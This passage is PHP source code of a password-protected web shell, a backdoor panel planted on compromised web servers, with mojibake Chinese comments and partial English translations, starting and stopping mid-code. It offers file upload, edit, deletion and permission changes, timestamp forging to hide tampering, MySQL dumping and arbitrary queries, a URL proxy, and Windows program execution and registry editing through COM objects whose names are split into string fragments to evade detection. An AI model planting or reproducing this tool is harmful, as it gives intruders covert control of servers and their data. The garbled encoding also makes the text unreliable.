"; # echo "×¢Ïú³É¹¦......

ÈiÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌGò½çÃæ >>>"; echo "::you are logged out::

Clich to return >>>"; exit; } if ($_POST['do'] == 'login') { $thepass=trim($_POST['adminpass']); if ($admin['pass'] == $thepass) { setcookie ("adminpass",$thepass,time()+(1*24*3600)); echo ""; # echo "µÇ½³É¹¦......

ÈiÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌGò½çÃæ >>>"; echo "loging in......

if not redirected click here>>>"; exit; } } if (isset($_COOKIE['adminpass'])) { if ($_COOKIE['adminpass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== basic checks =====================*/ //magic_quotes_gpc check if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); } //PHPINFO if ($_GET['action'] == "phpinfo") { # echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊiÒѱ»½ûÓÃ,Çë²é¿´<PHP»·¾³±äÁ¿>"; echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() phpinfo<PHP Info>"; exit; } // ÔÚÏß´úÀí if (isset($_POST['url'])) { $proxycontents = @file_get_contents($_POST['url']); echo ($proxycontents) ? $proxycontents : "

»ñÈ¡ URL ÄÚÈIʧ°Ü

"; exit; } // ÏÂÔØÎļs if (!empty($downfile)) { if (!@file_exists($downfile)) { echo ""; } else { $filename = basename($downfile); $filename_info = explode('.', $filename); $fileext = $filename_info[count($filename_info)-1]; header('Content-type: application/x-'.$fileext); header('Content-Disposition: attachment; filename='.$filename); header('Content-Description: PHP Generated Data'); header('Content-Length: '.filesize($downfile)); @readfile($downfile); exit; } } // Ö±½ÓÏÂÔر¸·IÊi¾I¿â if ($_POST['backuptype'] == 'download') { @mysql_connect($servername,$dbusername,$dbpassword) or die("Cant Connect"); @mysql_select_db($dbname) or die("Database error"); $table = array_flip($_POST['table']); $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "³ö´í: ".mysql_error(); $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata.= sqldumptable($currow[0]); $mysqldata.= $mysqldata."\r\n"; } } mysql_close(); exit; } // ³ÌGòĿ¼ $pathname=str_replace('\\','/',dirname(__FILE__)); // »ñÈ¡µ±Ç°Â·¾¶ if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // ÅG¶Ï¶ÁG´Çé¿ö $dir_writeable = (dir_writeable($nowpath)) ? "id" : "id"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | edit registry" : ""; $tb = new FORMS; ?> tableheader(); # translating this is a bitch $tb->tdbody('

'.$_SERVER['HTTP_HOST'].'

'.$_SERVER['REMOTE_ADDR'].'

','center','top'); $tb->tdbody('Logout | Dir | PHP EnvVars | ProxySurf'.$reg.$phpinfo.' | WebShell | SQL Query | MySQL Backup'); $tb->tablefooter(); ?>

---

headerform(array('method'=>'GET','content'=>'

Location: '.$pathname.'
current: ('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
ChDir: '.$tb->makeinput('dir').' '.$tb->makeinput('','Go','','submit').' c:\bla [win] :: /folder [*nix]')); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'Upload: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Go','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'EditFile: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','Go','','submit'))); $tb->headerform(array('content'=>'Create Directory: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','Go','','submit'))); ?>

---

\n"; // ɾ³iÎļs if (!empty($delfile)) { if (file_exists($delfile)) { echo (@unlink($delfile)) ? $delfile." ɾ³i³É¹¦!" : "Îļsɾ³iʧ°Ü!"; } else { echo basename($delfile)." ÎļsÒѲ»´æÔÚ!"; } } // ɾ³iĿ¼ elseif (!empty($deldir)) { $deldirs="$dir/$deldir"; if (!file_exists("$deldirs")) { echo "$deldir Ŀ¼ÒѲ»´æÔÚ!"; } else { echo (deltree($deldirs)) ? "Ŀ¼ɾ³i³É¹¦!" : "Ŀ¼ɾ³iʧ°Ü!"; } } // ´´½¨Ä¿Â¼ elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "¸ÃĿ¼ÒÑ´æÔÚ!"; } else { echo (@mkdir("$mkdirs",0777)) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!"; @chmod("$mkdirs",0777); } } } // ÉÏ´«Îļs elseif ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!"; } // ±à¼­Îļs elseif ($_POST['do'] == 'doeditfile') { if (!empty($_POST['editfilename'])) { $filename="$editfilename"; @$fp=fopen("$filename","w"); echo $msg=@fwrite($fp,$_POST['filecontent']) ? "G´ÈëÎļs³É¹¦!" : "G´Èëʧ°Ü!"; @fclose($fp); } else { echo "ÇëÊäÈëÏëÒª±à¼­µÄÎļsÃû!"; } } // ±à¼­ÎļsÊôGÔ elseif ($_POST['do'] == 'editfileperm') { if (!empty($_POST['fileperm'])) { $fileperm=base_convert($_POST['fileperm'],8,10); echo (@chmod($dir."/".$file,$fileperm)) ? "ÊôGÔGS¸Ä³É¹¦!" : "GS¸Äʧ°Ü!"; echo " Îļs ".$file." GS¸ÄºóµÄÊôGÔΪ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); } else { echo "ÇëÊäÈëÏëÒªÉèÖõÄÊôGÔ!"; } } // Îļs¸ÄÃû elseif ($_POST['do'] == 'rename') { if (!empty($_POST['newname'])) { $newname=$_POST['dir']."/".$_POST['newname']; if (@file_exists($newname)) { echo "".$_POST['newname']." ÒѾ­´æÔÚ,ÇëÖØGÂÊäÈëÒ»¸ö!"; } else { echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ³É¹¦¸ÄÃûΪ ".$_POST['newname']." !" : "ÎļsÃûGS¸Äʧ°Ü!"; } } else { echo "ÇëÊäÈëÏëÒª¸ÄµÄÎļsÃû!"; } } // ¿Ë¡ʱ¼ä elseif ($_POST['do'] == 'domodtime') { if (!@file_exists($_POST['curfile'])) { echo "ÒªGS¸ÄµÄÎļs²»´æÔÚ!"; } else { if (!@file_exists($_POST['tarfile'])) { echo "Òª²ÎÕÕµÄÎļs²»´æÔÚ!"; } else { $time=@filemtime($_POST['tarfile']); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." Change Date ".date("Y-m-d H:i:s",$time)." !" : "ÎļsµÄGS¸Äʱ¼äGS¸Äʧ°Ü!"; } } } // ×Ô¶¨Òåʱ¼ä elseif ($_POST['do'] == 'modmytime') { if (!@file_exists($_POST['curfile'])) { # echo "ÒªGS¸ÄµÄÎļs²»´æÔÚ!"; # bleh echo "Warning - you are changing the date / time!"; } else { $year=$_POST['year']; $month=$_POST['month']; $data=$_POST['data']; $hour=$_POST['hour']; $minute=$_POST['minute']; $second=$_POST['second']; if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { $time=strtotime("$data $month $year $hour:$minute:$second"); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." Change Date ".date("Y-m-d H:i:s",$time)." !" : "ÎļsµÄGS¸Äʱ¼äGS¸Äʧ°Ü!"; } } } // Á¬½ÓMYSQL elseif ($connect) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { echo "Êi¾I¿âÁ¬½Ó³É¹¦!"; mysql_close(); } else { echo mysql_error(); } } // Ö´GGSQLÓï¾ä elseif ($_POST['do'] == 'query') { @mysql_connect($servername,$dbusername,$dbpassword) or die("Êi¾I¿âÁ¬½Óʧ°Ü"); @mysql_select_db($dbname) or die("Ñ¡ÔñÊi¾I¿âʧ°Ü"); $result = @mysql_query($_POST['sql_query']); echo ($result) ? "SQLÓï¾ä³É¹¦Ö´GG!" : "³ö´í: ".mysql_error(); mysql_close(); } // ±¸·I²Ù×÷ elseif ($_POST['do'] == 'backupmysql') { if (empty($_POST['table']) OR empty($_POST['backuptype'])) { echo "ÇëÑ¡ÔñÓû±¸·IµÄÊi¾I±íºÍ±¸·I·½Ê½!"; } else { if ($_POST['backuptype'] == 'server') { @mysql_connect($servername,$dbusername,$dbpassword) or die("Êi¾I¿âÁ¬½Óʧ°Ü"); @mysql_select_db($dbname) or die("Ñ¡ÔñÊi¾I¿âʧ°Ü"); $table = array_flip($_POST['table']); $filehandle = @fopen($path,"w"); if ($filehandle) { $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "³ö´í: ".mysql_error(); while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $filehandle); fwrite($filehandle,"\n\n\n"); } } fclose($filehandle); echo "Êi¾I¿âÒѳɹ¦±¸·Iµ½ ".$path.""; mysql_close(); } else { echo "±¸·Iʧ°Ü,ÇëÈ·ÈÏÄ¿±êÎļs¼GÊÇ·ñ¾ßÓG¿ÉG´È¨ÏS!"; } } } } // ´ò°üÏÂÔØ PS:ÎļsÌ«´ó¿ÉÄܷdz£Âi // Thx : G¡»¨ elseif($downrar) { if (!empty($dl)) { $dfiles=""; foreach ($dl AS $filepath=>$value) { $dfiles.=$filepath.","; } $dfiles=substr($dfiles,0,strlen($dfiles)-1); $dl=explode(",",$dfiles); $zip=new PHPZip($dl); $code=$zip->out; header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz"); echo $code; exit; } else { echo "ÇëÑ¡ÔñÒª´ò°üÏÂÔصÄÎļs!"; } } // Shell.Application ÔËGG³ÌGò elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); echo ($a=='0') ? "³ÌGòÒѾ­³É¹¦Ö´GG!" : "³ÌGòÔËGGʧ°Ü!"; } // ²é¿´PHPÅäÖòÎÊi×´¿ö elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { echo "ÅäÖòÎÊi ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname']).""; } // ¶Áȡע²á±í elseif(($regread) AND !empty($_POST['readregname'])) { $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); var_dump(@$shell->RegRead($_POST['readregname'])); } // G´Èë×¢²á±í elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); echo ($a=='0') ? "G´Èë×¢²á±í½¡Öµ³É¹¦!" : "G´Èë ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ°Ü!"; } // ɾ³i×¢²á±í elseif(($regdelete) AND !empty($_POST['delregname'])) { $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); $a = @$shell->RegDelete($_POST['delregname']); echo ($a=='0') ? "ɾ³i×¢²á±í½¡Öµ³É¹¦!" : "ɾ³i ".$_POST['delregname']." ʧ°Ü!"; } else { echo "Links: Security Angel <--This script home ::: [Exploitlabs] Security / Penetration Testing ::: illmob ...in your face"; } echo "

\n"; //*===================== Ö´GG²Ù×÷ ½áÊø =====================* // table data? if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); ?>